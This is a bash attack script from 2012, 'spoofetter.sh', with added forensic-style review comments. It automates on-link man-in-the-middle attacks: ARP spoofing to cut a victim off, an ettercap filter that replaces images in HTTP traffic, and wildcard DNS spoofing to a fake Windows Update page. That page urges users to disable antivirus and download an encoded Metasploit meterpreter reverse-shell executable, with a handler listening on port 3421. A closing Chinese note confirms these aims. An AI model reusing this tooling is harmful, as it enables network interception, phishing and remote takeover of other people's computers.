spoofetter.sh Version 0.1

#!/bin/bash
#Author: Qingzheng 
#2012-11-11
#spoofetter.sh Version 0.1
#Email:qingzheng.2008@163.com
#
# Review notes (layout restored from a collapsed listing; code tokens and
# string literals are unchanged):
#
# Interactive menu script that chains ifconfig/route, nmap, arpspoof,
# ettercap/etterfilter, apache2 and Metasploit (msfpayload/msfencode/
# msfconsole) to run one of three on-link man-in-the-middle scenarios against
# a host picked from a /24 ping sweep.
#
# Host-side changes and artefacts visible in this listing (useful for
# forensics on a box that ran it):
#   - /proc/sys/net/ipv4/ip_forward set to 1
#   - /etc/etter.conf rewritten in place by sed
#   - /usr/local/share/ettercap/etter.dns replaced by a single wildcard A
#     record, original moved to etter.dns.old
#   - /var/www/index.html overwritten, /var/www/Windows-KB655723-x86-ENU.exe
#     and /var/www/replancebrowseimg.jpg created
#   - ./tmp/listening.rc, ./tmp/replancebrowseimg.src, ./tmp/replancebrowseimg.ef
#   - a handler configured for TCP port 3421
# No code visible here reverts any of these on exit.
#
# Network-side, all three scenarios depend on forged ARP replies on the local
# segment; switch features such as Dynamic ARP Inspection with DHCP snooping,
# or ARP-change monitoring, address that layer. The HTTP rewriting only
# matches TCP port 80, so it does not apply to TLS-protected traffic.

# Print the coloured banner. Relies on the colour variables that Main assigns
# (red, purple, white), so it prints uncoloured text if called before Main.
function Usage(){
    echo -e "$red####################################################$white"
    echo -e "$red#             ${purple}spoofetter.sh                        $red#$white"
    echo -e "$red#             ${purple}Author:Qingzheng                     $red#$white"
    echo -e "$red####################################################$white"
}

# Prepare the local host: enable IPv4 forwarding, edit etter.conf, start
# apache2. Called from Main before every scenario.
function Ettercap_config(){
    echo -e "[$blue>$white] Start IPv4 Forward"
    # Persistent until reboot or an explicit reset; requires root.
    echo '1' >/proc/sys/net/ipv4/ip_forward
    echo -e "[$blue>$white] Change etter.conf"
    # sed is given the file name, so it ignores the grep output on stdin and
    # removes every '#' character in /etc/etter.conf, not only on the
    # "iptables -t" lines.
    grep "iptables -t" /etc/etter.conf | sed -i 's/#//g' /etc/etter.conf
    echo -e "[$blue>$white] Start apache"
    # Output and errors are discarded, so a failed start goes unnoticed.
    /etc/init.d/apache2 start &>/dev/null
    echo -e "[$blue>$white] Ettercap configure DONE!"
}

# Build the executable served from the web root, write a Metasploit resource
# file, open msfconsole in an xterm and show a countdown spinner.
# Globals read: localhost (this host's IPv4 address, set in Main).
function Listening(){
    echo -e "[$blue>$white] Make payload /var/www/Windows-KB655723-x86-ENU.exe"
    # Static indicators: the file name above and TCP port 3421.
    msfpayload windows/meterpreter/reverse_tcp LHOST=$localhost LPORT=3421 R | msfencode -t exe -e x86/shikata_ga_nai -c 10 -o /var/www/Windows-KB655723-x86-ENU.exe
    # Resource file is written under the current working directory; ./tmp must
    # already exist or the redirection fails.
    echo -en "use exploit/multi/handler\nset PAYLOAD windows/meterpreter/reverse_tcp\nset LHOST $localhost\nset LPORT 3421\nexploit\n" >$(pwd)/tmp/listening.rc
    echo -e "[$blue>$white] Start Listening..."
    xterm -hold -geometry 80x15+0+0 -e "msfconsole -r $(pwd)/tmp/listening.rc" &
    echo -en "[$blue+$white] Time [ "
    # Countdown: 15 outer steps, each 25 x 4 sleeps of 0.01 s (about 1 s), so
    # roughly 15 s in total while msfconsole starts in the other window.
    t="15"
    for h in `seq $t`;do
        let p=$t-$h
        echo -n "="
        for i in `seq 25`; do
            # Two-digit values need three backspaces to redraw, one-digit two.
            if [ "$p" -ge "10" ]; then
                sleep 0.01
                echo -en "|$p\b\b\b"
                sleep 0.01
                echo -en "/$p\b\b\b"
                sleep 0.01
                echo -en "-$p\b\b\b"
                sleep 0.01
                echo -en "\\\\$p\b\b\b"
            else
                sleep 0.01
                echo -en "|$p\b\b"
                sleep 0.01
                echo -en "/$p\b\b"
                sleep 0.01
                echo -en "-$p\b\b"
                sleep 0.01
                echo -en "\\\\$p\b\b"
            fi
        done
    done
    echo " ]"
}

# Start 20 background arpspoof processes plus one in the foreground, all with
# the same arguments (-t $gateway $dsthost).
# Globals read: interface, gateway, dsthost (set in Main).
# The background processes are never reaped or killed by this script.
function ARPSpoofAttack(){
    for ((i=0;i<=19;i++));do
        echo -e "[$blue>$white] Run ARP_Spoof_Attack...processes $i"
        arpspoof -i $interface -t $gateway $dsthost &>/dev/null &
    done
    # i is 20 here; this last instance blocks until interrupted.
    echo -e "[$blue>$white] Run ARP_Spoof_Attack...processes $i"
    arpspoof -i $interface -t $gateway $dsthost
}

# Copy ./tmp/replancebrowseimg.jpg to the web root, write and compile an
# ettercap filter, then run ettercap with that filter against $dsthost.
# Globals read: interface, dsthost, localhost.
function ReplanceBrowseImg(){
    echo -e "[$blue>$white] Copy $(pwd) /var/www"
    if [ -e $(pwd)/tmp/replancebrowseimg.jpg ]; then
        cp -rf $(pwd)/tmp/replancebrowseimg.jpg /var/www
    else
        echo -e "[$blue>$white] No founding $(pwd)/tmp/replancebrowseimg.jpg"
        # Exits the whole script (status of the preceding echo), not just
        # this menu choice.
        exit
    fi
    echo -e "[$blue>$white] Create file replancebrowseimg.src!"
    # Filter source: on requests to port 80 it renames the Accept-Encoding
    # header (presumably so responses come back uncompressed and matchable);
    # on responses from port 80 it rewrites "img src=" to point at this host.
    # NOTE(review): the literal is kept byte-for-byte as it appears on the
    # page, where it sits on one line; the author's file presumably had line
    # breaks inside it, which are not reconstructed here.
    echo "# This is ettercap scriptif (ip.proto == TCP && tcp.dst == 80) {        if (search(DATA.data, \"Accept-Encoding\")) {                replace(\"Accept-Encoding\", \"Accept-Mousecat\");                msg(\"zapped Accept-Encoding!\n\");        }}if (ip.proto == TCP && tcp.src == 80) {        replace(\"img src=\", \"img src=\"http://$localhost/replancebrowseimg.jpg\" \");        replace(\"IMG SRC=\", \"img src=\"http://$localhost/replancebrowseimg.jpg\" \");        msg(\"Filter Ran.\n\");}" >$(pwd)/tmp/replancebrowseimg.src
    # Compile the filter and show the last five non-empty lines of the
    # compiler output, each prefixed with a green "[>]" marker.
    echo -e "`etterfilter $(pwd)/tmp/replancebrowseimg.src -o $(pwd)/tmp/replancebrowseimg.ef | grep -v "^$" | tail -n5 | sed 's/^/[\\\e[01;32m>\\\e[00m]/g'`"
    echo -e "[$blue>$white] Compile replancebrowseimg.src DONE!"
    echo -e "[$blue>$white] Img path http://$localhost/replancebrowseimg.jpg"
    echo -e "[$blue>$white] Run Replance_Browse_Img ..."
    # Text-mode, quiet ettercap with ARP poisoning between all hosts (//) and
    # $dsthost; runs in the foreground with its output prefixed by "[+] ".
    ettercap -i $interface -T -q -F $(pwd)/tmp/replancebrowseimg.ef -M arp:remote // /$dsthost/ | sed 's/^/[+] /g'
}

# Overwrite the web root index page, call Listening, replace etter.dns with a
# wildcard record for this host and start ettercap's dns_spoof plugin in an
# xterm.
# Globals read: interface, dsthost, localhost.
function DNSSpoofAttack(){
    # The page imitates an update prompt and links to the executable written
    # by Listening. The literal is kept byte-for-byte as on the page (single
    # line). Any existing /var/www/index.html is lost; no backup is taken.
    echo "<!-- evil html --><!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/1999/REC-html1401-19991224/strict.dtd\"><html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" /><title>Windows Update</title><style type=\"text/css\">.style2{        font-family:Arial, Helvetica, scans-serif;        font-weight:bold;        font-size:14px;        color:#999999;}.style3{        font-family:Arial, Helvetica, scans-serif;        font-weight:bold;        font-size:10px;        color:#999999;}</style></head><body><script type=\"text/javascript\">        setInterval(\"webjx.innerHTML=new Date().toLocaleString();\",1000);        document.write(\"Browser name: \"+navigator.appName+\"<hr />\")</script><p align=\"center\" class=\"style2\">High-risk vulnerabilities detected browser<br />Tip: turn off anti-virus software</p><p align=\"center\"><input align=\"center\" type=\"button\" name=\"Button\" value=\"Download Update\" onClick=\"window.open('/Windows-KB655723-x86-ENU.exe','download'); return false;\"></p><br /><div align=\"center\" id=\"webjx\" class=\"style3\"></div></body></html>" >/var/www/index.html
    Listening
    # Back up etter.dns once; a pre-existing etter.dns.old is left untouched.
    if [ ! -e "/usr/local/share/ettercap/etter.dns.old" ]; then
        if [ -e /usr/local/share/ettercap/etter.dns ]; then
            mv /usr/local/share/ettercap/etter.dns /usr/local/share/ettercap/etter.dns.old
            echo -e "[$blue>$white] Backup etter.dns.old"
        else
            echo -e "[$blue>$white] No founding /usr/local/share/ettercap/etter.dns"
            echo -e "[$blue>$white] Create new file /usr/local/share/ettercap/etter.dns"
            touch /usr/local/share/ettercap/etter.dns
        fi
    else
        echo -e "[$blue>$white] Alredy backup etter.dns.old"
    fi
    echo -e "[$blue>$white] Change etter.dns"
    # Single wildcard entry: every A query answered by the plugin resolves to
    # this host. Resolver-side, this shows up as unrelated names all mapping
    # to one on-link address.
    echo "* A $localhost" >/usr/local/share/ettercap/etter.dns
    echo -e "[$blue>$white] Run DNS_Spoof_Attack..."
    xterm -geometry 80x15+0+230 -e "ettercap -i $interface -T -q -P dns_spoof -M arp:remote // /$dsthost/" &
}

##########################################################################           Main         #################################################################################################
# Interactive loop: pick an interface, sweep its /24 with nmap, pick a host,
# pick a scenario, then dispatch. Sets the globals used by every other
# function (colour codes, interface, localhost, gateway, dsthost).
function Main(){
    blue="\e[01;34m"
    red="\e[00;31m"
    green="\e[00;32m"
    purple="\e[00;35m"
    white="\e[00m"
    underline="\\033[4m"
    # "[ True ]" tests a non-empty string, so the loop never ends on its own.
    while [ True ]; do
        Usage
        # Numbered list "[n]: ifname" built from the old net-tools ifconfig
        # format ("Link encap"); grep -v "lo" drops any name containing "lo".
        allinterface=`ifconfig | grep "Link encap" | awk '{print $1}' | grep -v "lo" | grep -n "" | sed 's/^/[/g' | sed 's/:/]: /g'`
        echo -e "$purple${allinterface}$white"
        echo -en "${underline}Interface$white:$blue>>$white "
        # Operator input is used unvalidated as part of a grep pattern below.
        read numinterface
        interface=`echo "$allinterface" | grep "\[$numinterface\]" | cut -d' ' -f2`
        localhost=`ifconfig $interface | grep "inet addr" | grep -v "127.0.0.1" | cut -d':' -f2 | awk '{print $1}'`
        # Gateway column of every route flagged "UG"; may be more than one line.
        gateway=`route -n | grep "UG" | awk '{print $2}' | uniq`
        echo -e "[$blue>$white] Local IP: $green${localhost}$white"
        echo -e "[$blue>$white] Gateway:  $green${gateway}$white"
        echo -e "[$blue>$white] Online Host!!"
        # Ping sweep (-sn) with no DNS resolution (-n); a /24 is assumed
        # regardless of the interface's real netmask.
        a=`nmap -T4 -sn -n $localhost/24`
        scanhost=`echo "$a" | grep "Nmap scan" | cut -d' ' -f5 | grep -v "$localhost" | grep -n "" | sed -e 's/^/[/g' -e 's/:/]: /g'`
        # Fields 3..9 of each "MAC Address:" line, concatenated with no separator.
        b=`echo "$a" | grep "MAC Address:" | awk 'FS=" " {print $3 $4 $5 $6 $7 $8 $9}'`
        c=`echo "$scanhost" | wc -l`
        # Print host i next to MAC line i. "[ $i%2==1 ]" is a one-word test and
        # therefore always true; both branches do the same work anyway.
        for ((i=1;i<$c+1;i++));do
            if [ $i%2==1 ]; then
                u=$(echo -en "`echo "$scanhost" | sed -n ${i}p`\t" && echo "$b" | sed -n ${i}p)
                echo -e "$purple${u}$white"
            else
                v=$(echo -en "`echo "$scanhost" | sed -n ${i}p`\t" && echo "$b" | sed -n ${i}p)
                echo -e "$purple${v}$white"
            fi
        done
        echo -en "${underline}Dstination host$white:$blue>>$white "
        read numdsthost
        dsthost=`echo "$scanhost" | grep "\[$numdsthost\]" | cut -d' ' -f2`
        Attoption=`echo -e "ARP_Spoof_Attack\nReplance_Browse_Img\nDNS_Spoof_Attack" | grep -n "" | sed -e 's/^/[/g' -e 's/:/]: /g'`
        echo -e "${purple}$Attoption${white}"
        echo -en "${underline}Attack Option${white}:$blue>>$white "
        read numattack
        attackoption=`echo "$Attoption" | grep "\[$numattack\]" | cut -d' ' -f2`
        # Host preparation runs even when the menu choice matches nothing.
        Ettercap_config
        case $attackoption in
            "ARP_Spoof_Attack")
                ARPSpoofAttack
            ;;
            "Replance_Browse_Img")
                ReplanceBrowseImg
            ;;
            "DNS_Spoof_Attack")
                DNSSpoofAttack
            ;;
        esac
        echo
    done
}
Main

 

这个脚本有三个功能:第一个是 ARP 欺骗断网攻击;第二个是照片替换,不过经测试这个替换效果不好,过滤规则也没太写好;最后一个是 ARP DNS 欺骗,并伪造成升级网页,诱骗用户下载并双击 exe 文件,反弹一个 shell。
